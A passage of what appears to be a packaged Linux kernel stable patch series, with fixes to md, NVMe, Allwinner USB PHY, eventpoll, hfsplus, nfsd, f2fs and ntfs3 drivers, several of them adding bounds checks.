+ static void md_submit_flush_data(struct work_struct *ws);
+@@ -913,10 +914,12 @@ static void super_written(struct bio *bio)
+ 	} else
+ 		clear_bit(LastDev, &rdev->flags);
+ 
++	bio_put(bio);
++
++	rdev_dec_pending(rdev, mddev);
++
+ 	if (atomic_dec_and_test(&mddev->pending_writes))
+ 		wake_up(&mddev->sb_wait);
+-	rdev_dec_pending(rdev, mddev);
+-	bio_put(bio);
+ }
+ 
+ void md_super_write(struct mddev *mddev, struct md_rdev *rdev,
+diff --git a/drivers/mfd/mt6360-core.c b/drivers/mfd/mt6360-core.c
+index 6eaa6775b8885..d3b32eb798377 100644
+--- a/drivers/mfd/mt6360-core.c
++++ b/drivers/mfd/mt6360-core.c
+@@ -402,7 +402,7 @@ static int mt6360_regmap_read(void *context, const void *reg, size_t reg_size,
+ 	struct mt6360_ddata *ddata = context;
+ 	u8 bank = *(u8 *)reg;
+ 	u8 reg_addr = *(u8 *)(reg + 1);
+-	struct i2c_client *i2c = ddata->i2c[bank];
++	struct i2c_client *i2c;
+ 	bool crc_needed = false;
+ 	u8 *buf;
+ 	int buf_len = MT6360_ALLOC_READ_SIZE(val_size);
+@@ -410,6 +410,11 @@ static int mt6360_regmap_read(void *context, const void *reg, size_t reg_size,
+ 	u8 crc;
+ 	int ret;
+ 
++	if (bank >= MT6360_SLAVE_MAX)
++		return -EINVAL;
++
++	i2c = ddata->i2c[bank];
++
+ 	if (bank == MT6360_SLAVE_PMIC || bank == MT6360_SLAVE_LDO) {
+ 		crc_needed = true;
+ 		ret = mt6360_xlate_pmicldo_addr(&reg_addr, val_size);
+@@ -453,13 +458,18 @@ static int mt6360_regmap_write(void *context, const void *val, size_t val_size)
+ 	struct mt6360_ddata *ddata = context;
+ 	u8 bank = *(u8 *)val;
+ 	u8 reg_addr = *(u8 *)(val + 1);
+-	struct i2c_client *i2c = ddata->i2c[bank];
++	struct i2c_client *i2c;
+ 	bool crc_needed = false;
+ 	u8 *buf;
+ 	int buf_len = MT6360_ALLOC_WRITE_SIZE(val_size);
+ 	int write_size = val_size - MT6360_REGMAP_REG_BYTE_SIZE;
+ 	int ret;
+ 
++	if (bank >= MT6360_SLAVE_MAX)
++		return -EINVAL;
++
++	i2c = ddata->i2c[bank];
++
+ 	if (bank == MT6360_SLAVE_PMIC || bank == MT6360_SLAVE_LDO) {
+ 		crc_needed = true;
+ 		ret = mt6360_xlate_pmicldo_addr(&reg_addr, val_size - MT6360_REGMAP_REG_BYTE_SIZE);
+diff --git a/drivers/mmc/host/vub300.c b/drivers/mmc/host/vub300.c
+index ab36ec4797478..72f65f32abbc7 100644
+--- a/drivers/mmc/host/vub300.c
++++ b/drivers/mmc/host/vub300.c
+@@ -2049,6 +2049,7 @@ static void vub300_enable_sdio_irq(struct mmc_host *mmc, int enable)
+ 		return;
+ 	kref_get(&vub300->kref);
+ 	if (enable) {
++		set_current_state(TASK_RUNNING);
+ 		mutex_lock(&vub300->irq_mutex);
+ 		if (vub300->irqs_queued) {
+ 			vub300->irqs_queued -= 1;
+@@ -2064,6 +2065,7 @@ static void vub300_enable_sdio_irq(struct mmc_host *mmc, int enable)
+ 			vub300_queue_poll_work(vub300, 0);
+ 		}
+ 		mutex_unlock(&vub300->irq_mutex);
++		set_current_state(TASK_INTERRUPTIBLE);
+ 	} else {
+ 		vub300->irq_enabled = 0;
+ 	}
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index 488ad7dabeb8e..115d81def5671 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -35,7 +35,7 @@
+ #define SQ_SIZE(q)	((q)->q_depth << (q)->sqes)
+ #define CQ_SIZE(q)	((q)->q_depth * sizeof(struct nvme_completion))
+ 
+-#define SGES_PER_PAGE	(PAGE_SIZE / sizeof(struct nvme_sgl_desc))
++#define SGES_PER_PAGE	(NVME_CTRL_PAGE_SIZE / sizeof(struct nvme_sgl_desc))
+ 
+ /*
+  * These can be higher, but we need to ensure that any command doesn't
+@@ -144,9 +144,9 @@ struct nvme_dev {
+ 	mempool_t *iod_mempool;
+ 
+ 	/* shadow doorbell buffer support: */
+-	u32 *dbbuf_dbs;
++	__le32 *dbbuf_dbs;
+ 	dma_addr_t dbbuf_dbs_dma_addr;
+-	u32 *dbbuf_eis;
++	__le32 *dbbuf_eis;
+ 	dma_addr_t dbbuf_eis_dma_addr;
+ 
+ 	/* host memory buffer support: */
+@@ -210,10 +210,10 @@ struct nvme_queue {
+ #define NVMEQ_SQ_CMB		1
+ #define NVMEQ_DELETE_ERROR	2
+ #define NVMEQ_POLLED		3
+-	u32 *dbbuf_sq_db;
+-	u32 *dbbuf_cq_db;
+-	u32 *dbbuf_sq_ei;
+-	u32 *dbbuf_cq_ei;
++	__le32 *dbbuf_sq_db;
++	__le32 *dbbuf_cq_db;
++	__le32 *dbbuf_sq_ei;
++	__le32 *dbbuf_cq_ei;
+ 	struct completion delete_done;
+ };
+ 
+@@ -340,11 +340,11 @@ static inline int nvme_dbbuf_need_event(u16 event_idx, u16 new_idx, u16 old)
+ }
+ 
+ /* Update dbbuf and return true if an MMIO is required */
+-static bool nvme_dbbuf_update_and_check_event(u16 value, u32 *dbbuf_db,
+-					      volatile u32 *dbbuf_ei)
++static bool nvme_dbbuf_update_and_check_event(u16 value, __le32 *dbbuf_db,
++					      volatile __le32 *dbbuf_ei)
+ {
+ 	if (dbbuf_db) {
+-		u16 old_value;
++		u16 old_value, event_idx;
+ 
+ 		/*
+ 		 * Ensure that the queue is written before updating
+@@ -352,8 +352,8 @@ static bool nvme_dbbuf_update_and_check_event(u16 value, u32 *dbbuf_db,
+ 		 */
+ 		wmb();
+ 
+-		old_value = *dbbuf_db;
+-		*dbbuf_db = value;
++		old_value = le32_to_cpu(*dbbuf_db);
++		*dbbuf_db = cpu_to_le32(value);
+ 
+ 		/*
+ 		 * Ensure that the doorbell is updated before reading the event
+@@ -363,7 +363,8 @@ static bool nvme_dbbuf_update_and_check_event(u16 value, u32 *dbbuf_db,
+ 		 */
+ 		mb();
+ 
+-		if (!nvme_dbbuf_need_event(*dbbuf_ei, value, old_value))
++		event_idx = le32_to_cpu(*dbbuf_ei);
++		if (!nvme_dbbuf_need_event(event_idx, value, old_value))
+ 			return false;
+ 	}
+ 
+@@ -377,9 +378,9 @@ static bool nvme_dbbuf_update_and_check_event(u16 value, u32 *dbbuf_db,
+  */
+ static int nvme_pci_npages_prp(void)
+ {
+-	unsigned nprps = DIV_ROUND_UP(NVME_MAX_KB_SZ + NVME_CTRL_PAGE_SIZE,
+-				      NVME_CTRL_PAGE_SIZE);
+-	return DIV_ROUND_UP(8 * nprps, PAGE_SIZE - 8);
++	unsigned max_bytes = (NVME_MAX_KB_SZ * 1024) + NVME_CTRL_PAGE_SIZE;
++	unsigned nprps = DIV_ROUND_UP(max_bytes, NVME_CTRL_PAGE_SIZE);
++	return DIV_ROUND_UP(8 * nprps, NVME_CTRL_PAGE_SIZE - 8);
+ }
+ 
+ /*
+@@ -389,7 +390,7 @@ static int nvme_pci_npages_prp(void)
+ static int nvme_pci_npages_sgl(void)
+ {
+ 	return DIV_ROUND_UP(NVME_MAX_SEGS * sizeof(struct nvme_sgl_desc),
+-			PAGE_SIZE);
++			NVME_CTRL_PAGE_SIZE);
+ }
+ 
+ static size_t nvme_pci_iod_alloc_size(void)
+@@ -713,7 +714,7 @@ static void nvme_pci_sgl_set_seg(struct nvme_sgl_desc *sge,
+ 		sge->length = cpu_to_le32(entries * sizeof(*sge));
+ 		sge->type = NVME_SGL_FMT_LAST_SEG_DESC << 4;
+ 	} else {
+-		sge->length = cpu_to_le32(PAGE_SIZE);
++		sge->length = cpu_to_le32(NVME_CTRL_PAGE_SIZE);
+ 		sge->type = NVME_SGL_FMT_SEG_DESC << 4;
+ 	}
+ }
+diff --git a/drivers/nvme/target/passthru.c b/drivers/nvme/target/passthru.c
+index 79af5140af8bf..adc0958755d66 100644
+--- a/drivers/nvme/target/passthru.c
++++ b/drivers/nvme/target/passthru.c
+@@ -334,14 +334,13 @@ static void nvmet_passthru_execute_cmd(struct nvmet_req *req)
+ 	}
+ 
+ 	/*
+-	 * If there are effects for the command we are about to execute, or
+-	 * an end_req function we need to use nvme_execute_passthru_rq()
+-	 * synchronously in a work item seeing the end_req function and
+-	 * nvme_passthru_end() can't be called in the request done callback
+-	 * which is typically in interrupt context.
++	 * If a command needs post-execution fixups, or there are any
++	 * non-trivial effects, make sure to execute the command synchronously
++	 * in a workqueue so that nvme_passthru_end gets called.
+ 	 */
+ 	effects = nvme_command_effects(ctrl, ns, req->cmd->common.opcode);
+-	if (req->p.use_workqueue || effects) {
++	if (req->p.use_workqueue ||
++	    (effects & ~(NVME_CMD_EFFECTS_CSUPP | NVME_CMD_EFFECTS_LBCC))) {
+ 		INIT_WORK(&req->p.work, nvmet_passthru_execute_cmd_work);
+ 		req->p.rq = rq;
+ 		queue_work(nvmet_wq, &req->p.work);
+diff --git a/drivers/phy/allwinner/phy-sun4i-usb.c b/drivers/phy/allwinner/phy-sun4i-usb.c
+index 3a3831f6059a3..5472db9e87ef8 100644
+--- a/drivers/phy/allwinner/phy-sun4i-usb.c
++++ b/drivers/phy/allwinner/phy-sun4i-usb.c
+@@ -120,6 +120,7 @@ struct sun4i_usb_phy_cfg {
+ 	u8 phyctl_offset;
+ 	bool dedicated_clocks;
+ 	bool phy0_dual_route;
++	bool needs_phy2_siddq;
+ 	int missing_phys;
+ };
+ 
+@@ -289,6 +290,50 @@ static int sun4i_usb_phy_init(struct phy *_phy)
+ 		return ret;
+ 	}
+ 
++	/* Some PHYs on some SoCs need the help of PHY2 to work. */
++	if (data->cfg->needs_phy2_siddq && phy->index != 2) {
++		struct sun4i_usb_phy *phy2 = &data->phys[2];
++
++		ret = clk_prepare_enable(phy2->clk);
++		if (ret) {
++			reset_control_assert(phy->reset);
++			clk_disable_unprepare(phy->clk2);
++			clk_disable_unprepare(phy->clk);
++			return ret;
++		}
++
++		ret = reset_control_deassert(phy2->reset);
++		if (ret) {
++			clk_disable_unprepare(phy2->clk);
++			reset_control_assert(phy->reset);
++			clk_disable_unprepare(phy->clk2);
++			clk_disable_unprepare(phy->clk);
++			return ret;
++		}
++
++		/*
++		 * This extra clock is just needed to access the
++		 * REG_HCI_PHY_CTL PMU register for PHY2.
++		 */
++		ret = clk_prepare_enable(phy2->clk2);
++		if (ret) {
++			reset_control_assert(phy2->reset);
++			clk_disable_unprepare(phy2->clk);
++			reset_control_assert(phy->reset);
++			clk_disable_unprepare(phy->clk2);
++			clk_disable_unprepare(phy->clk);
++			return ret;
++		}
++
++		if (phy2->pmu && data->cfg->hci_phy_ctl_clear) {
++			val = readl(phy2->pmu + REG_HCI_PHY_CTL);
++			val &= ~data->cfg->hci_phy_ctl_clear;
++			writel(val, phy2->pmu + REG_HCI_PHY_CTL);
++		}
++
++		clk_disable_unprepare(phy->clk2);
++	}
++
+ 	if (phy->pmu && data->cfg->hci_phy_ctl_clear) {
+ 		val = readl(phy->pmu + REG_HCI_PHY_CTL);
+ 		val &= ~data->cfg->hci_phy_ctl_clear;
+@@ -354,6 +399,13 @@ static int sun4i_usb_phy_exit(struct phy *_phy)
+ 		data->phy0_init = false;
+ 	}
+ 
++	if (data->cfg->needs_phy2_siddq && phy->index != 2) {
++		struct sun4i_usb_phy *phy2 = &data->phys[2];
++
++		clk_disable_unprepare(phy2->clk);
++		reset_control_assert(phy2->reset);
++	}
++
+ 	sun4i_usb_phy_passby(phy, 0);
+ 	reset_control_assert(phy->reset);
+ 	clk_disable_unprepare(phy->clk2);
+@@ -785,6 +837,13 @@ static int sun4i_usb_phy_probe(struct platform_device *pdev)
+ 				dev_err(dev, "failed to get clock %s\n", name);
+ 				return PTR_ERR(phy->clk2);
+ 			}
++		} else {
++			snprintf(name, sizeof(name), "pmu%d_clk", i);
++			phy->clk2 = devm_clk_get_optional(dev, name);
++			if (IS_ERR(phy->clk2)) {
++				dev_err(dev, "failed to get clock %s\n", name);
++				return PTR_ERR(phy->clk2);
++			}
+ 		}
+ 
+ 		snprintf(name, sizeof(name), "usb%d_reset", i);
+@@ -973,6 +1032,17 @@ static const struct sun4i_usb_phy_cfg sun50i_h6_cfg = {
+ 	.missing_phys = BIT(1) | BIT(2),
+ };
+ 
++static const struct sun4i_usb_phy_cfg sun50i_h616_cfg = {
++	.num_phys = 4,
++	.type = sun50i_h6_phy,
++	.disc_thresh = 3,
++	.phyctl_offset = REG_PHYCTL_A33,
++	.dedicated_clocks = true,
++	.phy0_dual_route = true,
++	.hci_phy_ctl_clear = PHY_CTL_SIDDQ,
++	.needs_phy2_siddq = true,
++};
++
+ static const struct of_device_id sun4i_usb_phy_of_match[] = {
+ 	{ .compatible = "allwinner,sun4i-a10-usb-phy", .data = &sun4i_a10_cfg },
+ 	{ .compatible = "allwinner,sun5i-a13-usb-phy", .data = &sun5i_a13_cfg },
+@@ -988,6 +1058,7 @@ static const struct of_device_id sun4i_usb_phy_of_match[] = {
+ 	{ .compatible = "allwinner,sun50i-a64-usb-phy",
+ 	  .data = &sun50i_a64_cfg},
+ 	{ .compatible = "allwinner,sun50i-h6-usb-phy", .data = &sun50i_h6_cfg },
++	{ .compatible = "allwinner,sun50i-h616-usb-phy", .data = &sun50i_h616_cfg },
+ 	{ },
+ };
+ MODULE_DEVICE_TABLE(of, sun4i_usb_phy_of_match);
+diff --git a/drivers/rtc/rtc-msc313.c b/drivers/rtc/rtc-msc313.c
+index f3fde013c4b8b..8d7737e0e2e02 100644
+--- a/drivers/rtc/rtc-msc313.c
++++ b/drivers/rtc/rtc-msc313.c
+@@ -212,22 +212,12 @@ static int msc313_rtc_probe(struct platform_device *pdev)
+ 		return ret;
+ 	}
+ 
+-	clk = devm_clk_get(dev, NULL);
++	clk = devm_clk_get_enabled(dev, NULL);
+ 	if (IS_ERR(clk)) {
+ 		dev_err(dev, "No input reference clock\n");
+ 		return PTR_ERR(clk);
+ 	}
+ 
+-	ret = clk_prepare_enable(clk);
+-	if (ret) {
+-		dev_err(dev, "Failed to enable the reference clock, %d\n", ret);
+-		return ret;
+-	}
+-
+-	ret = devm_add_action_or_reset(dev, (void (*) (void *))clk_disable_unprepare, clk);
+-	if (ret)
+-		return ret;
+-
+ 	rate = clk_get_rate(clk);
+ 	writew(rate & 0xFFFF, priv->rtc_base + REG_RTC_FREQ_CW_L);
+ 	writew((rate >> 16) & 0xFFFF, priv->rtc_base + REG_RTC_FREQ_CW_H);
+diff --git a/drivers/soundwire/dmi-quirks.c b/drivers/soundwire/dmi-quirks.c
+index f81cdd83ec26e..7969881f126dc 100644
+--- a/drivers/soundwire/dmi-quirks.c
++++ b/drivers/soundwire/dmi-quirks.c
+@@ -90,6 +90,14 @@ static const struct dmi_system_id adr_remap_quirk_table[] = {
+ 		},
+ 		.driver_data = (void *)intel_tgl_bios,
+ 	},
++	{
++		/* quirk used for NUC15 LAPBC710 skew */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "Intel Corporation"),
++			DMI_MATCH(DMI_BOARD_NAME, "LAPBC710"),
++		},
++		.driver_data = (void *)intel_tgl_bios,
++	},
+ 	{
+ 		.matches = {
+ 			DMI_MATCH(DMI_SYS_VENDOR, "Dell Inc"),
+diff --git a/fs/binfmt_elf_fdpic.c b/fs/binfmt_elf_fdpic.c
+index 08d0c8797828c..9ce5e1f41c26f 100644
+--- a/fs/binfmt_elf_fdpic.c
++++ b/fs/binfmt_elf_fdpic.c
+@@ -434,8 +434,9 @@ static int load_elf_fdpic_binary(struct linux_binprm *bprm)
+ 	current->mm->start_stack = current->mm->start_brk + stack_size;
+ #endif
+ 
+-	if (create_elf_fdpic_tables(bprm, current->mm,
+-				    &exec_params, &interp_params) < 0)
++	retval = create_elf_fdpic_tables(bprm, current->mm, &exec_params,
++					 &interp_params);
++	if (retval < 0)
+ 		goto error;
+ 
+ 	kdebug("- start_code  %lx", current->mm->start_code);
+diff --git a/fs/eventfd.c b/fs/eventfd.c
+index c0ffee99ad238..249ca6c0b7843 100644
+--- a/fs/eventfd.c
++++ b/fs/eventfd.c
+@@ -43,21 +43,7 @@ struct eventfd_ctx {
+ 	int id;
+ };
+ 
+-/**
+- * eventfd_signal - Adds @n to the eventfd counter.
+- * @ctx: [in] Pointer to the eventfd context.
+- * @n: [in] Value of the counter to be added to the eventfd internal counter.
+- *          The value cannot be negative.
+- *
+- * This function is supposed to be called by the kernel in paths that do not
+- * allow sleeping. In this function we allow the counter to reach the ULLONG_MAX
+- * value, and we signal this as overflow condition by returning a EPOLLERR
+- * to poll(2).
+- *
+- * Returns the amount by which the counter was incremented.  This will be less
+- * than @n if the counter has overflowed.
+- */
+-__u64 eventfd_signal(struct eventfd_ctx *ctx, __u64 n)
++__u64 eventfd_signal_mask(struct eventfd_ctx *ctx, __u64 n, unsigned mask)
+ {
+ 	unsigned long flags;
+ 
+@@ -78,12 +64,31 @@ __u64 eventfd_signal(struct eventfd_ctx *ctx, __u64 n)
+ 		n = ULLONG_MAX - ctx->count;
+ 	ctx->count += n;
+ 	if (waitqueue_active(&ctx->wqh))
+-		wake_up_locked_poll(&ctx->wqh, EPOLLIN);
++		wake_up_locked_poll(&ctx->wqh, EPOLLIN | mask);
+ 	current->in_eventfd = 0;
+ 	spin_unlock_irqrestore(&ctx->wqh.lock, flags);
+ 
+ 	return n;
+ }
++
++/**
++ * eventfd_signal - Adds @n to the eventfd counter.
++ * @ctx: [in] Pointer to the eventfd context.
++ * @n: [in] Value of the counter to be added to the eventfd internal counter.
++ *          The value cannot be negative.
++ *
++ * This function is supposed to be called by the kernel in paths that do not
++ * allow sleeping. In this function we allow the counter to reach the ULLONG_MAX
++ * value, and we signal this as overflow condition by returning a EPOLLERR
++ * to poll(2).
++ *
++ * Returns the amount by which the counter was incremented.  This will be less
++ * than @n if the counter has overflowed.
++ */
++__u64 eventfd_signal(struct eventfd_ctx *ctx, __u64 n)
++{
++	return eventfd_signal_mask(ctx, n, 0);
++}
+ EXPORT_SYMBOL_GPL(eventfd_signal);
+ 
+ static void eventfd_free_ctx(struct eventfd_ctx *ctx)
+diff --git a/fs/eventpoll.c b/fs/eventpoll.c
+index 52954d4637b54..64659b1109733 100644
+--- a/fs/eventpoll.c
++++ b/fs/eventpoll.c
+@@ -491,7 +491,8 @@ static inline void ep_set_busy_poll_napi_id(struct epitem *epi)
+  */
+ #ifdef CONFIG_DEBUG_LOCK_ALLOC
+ 
+-static void ep_poll_safewake(struct eventpoll *ep, struct epitem *epi)
++static void ep_poll_safewake(struct eventpoll *ep, struct epitem *epi,
++			     unsigned pollflags)
+ {
+ 	struct eventpoll *ep_src;
+ 	unsigned long flags;
+@@ -522,16 +523,17 @@ static void ep_poll_safewake(struct eventpoll *ep, struct epitem *epi)
+ 	}
+ 	spin_lock_irqsave_nested(&ep->poll_wait.lock, flags, nests);
+ 	ep->nests = nests + 1;
+-	wake_up_locked_poll(&ep->poll_wait, EPOLLIN);
++	wake_up_locked_poll(&ep->poll_wait, EPOLLIN | pollflags);
+ 	ep->nests = 0;
+ 	spin_unlock_irqrestore(&ep->poll_wait.lock, flags);
+ }
+ 
+ #else
+ 
+-static void ep_poll_safewake(struct eventpoll *ep, struct epitem *epi)
++static void ep_poll_safewake(struct eventpoll *ep, struct epitem *epi,
++			     unsigned pollflags)
+ {
+-	wake_up_poll(&ep->poll_wait, EPOLLIN);
++	wake_up_poll(&ep->poll_wait, EPOLLIN | pollflags);
+ }
+ 
+ #endif
+@@ -742,7 +744,7 @@ static void ep_free(struct eventpoll *ep)
+ 
+ 	/* We need to release all tasks waiting for these file */
+ 	if (waitqueue_active(&ep->poll_wait))
+-		ep_poll_safewake(ep, NULL);
++		ep_poll_safewake(ep, NULL, 0);
+ 
+ 	/*
+ 	 * We need to lock this because we could be hit by
+@@ -1208,7 +1210,7 @@ out_unlock:
+ 
+ 	/* We have to call this outside the lock */
+ 	if (pwake)
+-		ep_poll_safewake(ep, epi);
++		ep_poll_safewake(ep, epi, pollflags & EPOLL_URING_WAKE);
+ 
+ 	if (!(epi->event.events & EPOLLEXCLUSIVE))
+ 		ewake = 1;
+@@ -1553,7 +1555,7 @@ static int ep_insert(struct eventpoll *ep, const struct epoll_event *event,
+ 
+ 	/* We have to call this outside the lock */
+ 	if (pwake)
+-		ep_poll_safewake(ep, NULL);
++		ep_poll_safewake(ep, NULL, 0);
+ 
+ 	return 0;
+ }
+@@ -1629,7 +1631,7 @@ static int ep_modify(struct eventpoll *ep, struct epitem *epi,
+ 
+ 	/* We have to call this outside the lock */
+ 	if (pwake)
+-		ep_poll_safewake(ep, NULL);
++		ep_poll_safewake(ep, NULL, 0);
+ 
+ 	return 0;
+ }
+diff --git a/fs/f2fs/gc.c b/fs/f2fs/gc.c
+index 22c1f876e8c52..b3184d8b1ce89 100644
+--- a/fs/f2fs/gc.c
++++ b/fs/f2fs/gc.c
+@@ -1109,6 +1109,7 @@ static bool is_alive(struct f2fs_sb_info *sbi, struct f2fs_summary *sum,
+ 	if (ofs_in_node >= max_addrs) {
+ 		f2fs_err(sbi, "Inconsistent ofs_in_node:%u in summary, ino:%u, nid:%u, max:%u",
+ 			ofs_in_node, dni->ino, dni->nid, max_addrs);
++		f2fs_put_page(node_page, 1);
+ 		return false;
+ 	}
+ 
+diff --git a/fs/f2fs/node.c b/fs/f2fs/node.c
+index 983572f238969..b9ee5a1176a07 100644
+--- a/fs/f2fs/node.c
++++ b/fs/f2fs/node.c
+@@ -1360,8 +1360,7 @@ static int read_node_page(struct page *page, blk_opf_t op_flags)
+ 		return err;
+ 
+ 	/* NEW_ADDR can be seen, after cp_error drops some dirty node pages */
+-	if (unlikely(ni.blk_addr == NULL_ADDR || ni.blk_addr == NEW_ADDR) ||
+-			is_sbi_flag_set(sbi, SBI_IS_SHUTDOWN)) {
++	if (unlikely(ni.blk_addr == NULL_ADDR || ni.blk_addr == NEW_ADDR)) {
+ 		ClearPageUptodate(page);
+ 		return -ENOENT;
+ 	}
+diff --git a/fs/hfsplus/hfsplus_fs.h b/fs/hfsplus/hfsplus_fs.h
+index a5db2e3b29801..6aa919e594834 100644
+--- a/fs/hfsplus/hfsplus_fs.h
++++ b/fs/hfsplus/hfsplus_fs.h
+@@ -198,6 +198,8 @@ struct hfsplus_sb_info {
+ #define HFSPLUS_SB_HFSX		3
+ #define HFSPLUS_SB_CASEFOLD	4
+ #define HFSPLUS_SB_NOBARRIER	5
++#define HFSPLUS_SB_UID		6
++#define HFSPLUS_SB_GID		7
+ 
+ static inline struct hfsplus_sb_info *HFSPLUS_SB(struct super_block *sb)
+ {
+diff --git a/fs/hfsplus/inode.c b/fs/hfsplus/inode.c
+index aeab83ed1c9c6..b675581aa9d0f 100644
+--- a/fs/hfsplus/inode.c
++++ b/fs/hfsplus/inode.c
+@@ -192,11 +192,11 @@ static void hfsplus_get_perms(struct inode *inode,
+ 	mode = be16_to_cpu(perms->mode);
+ 
+ 	i_uid_write(inode, be32_to_cpu(perms->owner));
+-	if (!i_uid_read(inode) && !mode)
++	if ((test_bit(HFSPLUS_SB_UID, &sbi->flags)) || (!i_uid_read(inode) && !mode))
+ 		inode->i_uid = sbi->uid;
+ 
+ 	i_gid_write(inode, be32_to_cpu(perms->group));
+-	if (!i_gid_read(inode) && !mode)
++	if ((test_bit(HFSPLUS_SB_GID, &sbi->flags)) || (!i_gid_read(inode) && !mode))
+ 		inode->i_gid = sbi->gid;
+ 
+ 	if (dir) {
+diff --git a/fs/hfsplus/options.c b/fs/hfsplus/options.c
+index 047e05c575601..c94a58762ad6d 100644
+--- a/fs/hfsplus/options.c
++++ b/fs/hfsplus/options.c
+@@ -140,6 +140,8 @@ int hfsplus_parse_options(char *input, struct hfsplus_sb_info *sbi)
+ 			if (!uid_valid(sbi->uid)) {
+ 				pr_err("invalid uid specified\n");
+ 				return 0;
++			} else {
++				set_bit(HFSPLUS_SB_UID, &sbi->flags);
+ 			}
+ 			break;
+ 		case opt_gid:
+@@ -151,6 +153,8 @@ int hfsplus_parse_options(char *input, struct hfsplus_sb_info *sbi)
+ 			if (!gid_valid(sbi->gid)) {
+ 				pr_err("invalid gid specified\n");
+ 				return 0;
++			} else {
++				set_bit(HFSPLUS_SB_GID, &sbi->flags);
+ 			}
+ 			break;
+ 		case opt_part:
+diff --git a/fs/nfsd/nfs4proc.c b/fs/nfsd/nfs4proc.c
+index 32fe7cbfb28b3..34d1cd5883fbb 100644
+--- a/fs/nfsd/nfs4proc.c
++++ b/fs/nfsd/nfs4proc.c
+@@ -1465,13 +1465,6 @@ out_err:
+ 	return status;
+ }
+ 
+-static void
+-nfsd4_interssc_disconnect(struct vfsmount *ss_mnt)
+-{
+-	nfs_do_sb_deactive(ss_mnt->mnt_sb);
+-	mntput(ss_mnt);
+-}
+-
+ /*
+  * Verify COPY destination stateid.
+  *
+@@ -1574,11 +1567,6 @@ nfsd4_cleanup_inter_ssc(struct vfsmount *ss_mnt, struct file *filp,
+ {
+ }
+ 
+-static void
+-nfsd4_interssc_disconnect(struct vfsmount *ss_mnt)
+-{
+-}
+-
+ static struct file *nfs42_ssc_open(struct vfsmount *ss_mnt,
+ 				   struct nfs_fh *src_fh,
+ 				   nfs4_stateid *stateid)
+@@ -1774,7 +1762,7 @@ static int nfsd4_do_async_copy(void *data)
+ 			default:
+ 				nfserr = nfserr_offload_denied;
+ 			}
+-			nfsd4_interssc_disconnect(copy->ss_mnt);
++			/* ss_mnt will be unmounted by the laundromat */
+ 			goto do_callback;
+ 		}
+ 		nfserr = nfsd4_do_copy(copy, filp, copy->nf_dst->nf_file,
+@@ -1855,8 +1843,10 @@ out_err:
+ 	if (async_copy)
+ 		cleanup_async_copy(async_copy);
+ 	status = nfserrno(-ENOMEM);
+-	if (nfsd4_ssc_is_inter(copy))
+-		nfsd4_interssc_disconnect(copy->ss_mnt);
++	/*
++	 * source's vfsmount of inter-copy will be unmounted
++	 * by the laundromat
++	 */
+ 	goto out;
+ }
+ 
+diff --git a/fs/ntfs3/attrib.c b/fs/ntfs3/attrib.c
+index 71f870d497aed..578c2bcfb1d93 100644
+--- a/fs/ntfs3/attrib.c
++++ b/fs/ntfs3/attrib.c
+@@ -101,6 +101,10 @@ static int attr_load_runs(struct ATTRIB *attr, struct ntfs_inode *ni,
+ 
+ 	asize = le32_to_cpu(attr->size);
+ 	run_off = le16_to_cpu(attr->nres.run_off);
++
++	if (run_off > asize)
++		return -EINVAL;
++
+ 	err = run_unpack_ex(run, ni->mi.sbi, ni->mi.rno, svcn, evcn,
+ 			    vcn ? *vcn : svcn, Add2Ptr(attr, run_off),
+ 			    asize - run_off);
+@@ -1217,6 +1221,11 @@ int attr_load_runs_vcn(struct ntfs_inode *ni, enum ATTR_TYPE type,
+ 	CLST svcn, evcn;
+ 	u16 ro;
+ 
++	if (!ni) {
++		/* Is record corrupted? */
++		return -ENOENT;
++	}
++
+ 	attr = ni_find_attr(ni, NULL, NULL, type, name, name_len, &vcn, NULL);
+ 	if (!attr) {
+ 		/* Is record corrupted? */
+@@ -1232,6 +1241,10 @@ int attr_load_runs_vcn(struct ntfs_inode *ni, enum ATTR_TYPE type,
+ 	}
+ 
+ 	ro = le16_to_cpu(attr->nres.run_off);
++
++	if (ro > le32_to_cpu(attr->size))
++		return -EINVAL;
++
+ 	err = run_unpack_ex(run, ni->mi.sbi, ni->mi.rno, svcn, evcn, svcn,
+ 			    Add2Ptr(attr, ro), le32_to_cpu(attr->size) - ro);
+ 	if (err < 0)
+@@ -1901,6 +1914,11 @@ int attr_collapse_range(struct ntfs_inode *ni, u64 vbo, u64 bytes)
+ 			u16 le_sz;
+ 			u16 roff = le16_to_cpu(attr->nres.run_off);
+ 
++			if (roff > le32_to_cpu(attr->size)) {
++				err = -EINVAL;
++				goto out;
++			}
++
+ 			run_unpack_ex(RUN_DEALLOCATE, sbi, ni->mi.rno, svcn,
+ 				      evcn1 - 1, svcn, Add2Ptr(attr, roff),
+ 				      le32_to_cpu(attr->size) - roff);
+diff --git a/fs/ntfs3/attrlist.c b/fs/ntfs3/attrlist.c
+index bad6d8a849a24..c0c6bcbc8c05c 100644
+--- a/fs/ntfs3/attrlist.c
++++ b/fs/ntfs3/attrlist.c
+@@ -68,6 +68,11 @@ int ntfs_load_attr_list(struct ntfs_inode *ni, struct ATTRIB *attr)
+ 
+ 		run_init(&ni->attr_list.run);
+ 
++		if (run_off > le32_to_cpu(attr->size)) {
++			err = -EINVAL;
++			goto out;
++		}
++
+ 		err = run_unpack_ex(&ni->attr_list.run, ni->mi.sbi, ni->mi.rno,
+ 				    0, le64_to_cpu(attr->nres.evcn), 0,
+ 				    Add2Ptr(attr, run_off),
+diff --git a/fs/ntfs3/bitmap.c b/fs/ntfs3/bitmap.c
+index 1930640be31a8..45f95c1cb2584 100644
+--- a/fs/ntfs3/bitmap.c
++++ b/fs/ntfs3/bitmap.c
+@@ -661,7 +661,7 @@ int wnd_init(struct wnd_bitmap *wnd, struct super_block *sb, size_t nbits)
+ 	if (!wnd->bits_last)
+ 		wnd->bits_last = wbits;
+ 
+-	wnd->free_bits = kcalloc(wnd->nwnd, sizeof(u16), GFP_NOFS);
++	wnd->free_bits = kcalloc(wnd->nwnd, sizeof(u16), GFP_NOFS | __GFP_NOWARN);
+ 	if (!wnd->free_bits)
+ 		return -ENOMEM;
+ 
+diff --git a/fs/ntfs3/frecord.c b/fs/ntfs3/frecord.c
+index 381a38a06ec22..b1b476fb7229b 100644
+--- a/fs/ntfs3/frecord.c
++++ b/fs/ntfs3/frecord.c
+@@ -568,6 +568,12 @@ static int ni_repack(struct ntfs_inode *ni)
+ 		}
+ 
+ 		roff = le16_to_cpu(attr->nres.run_off);
++
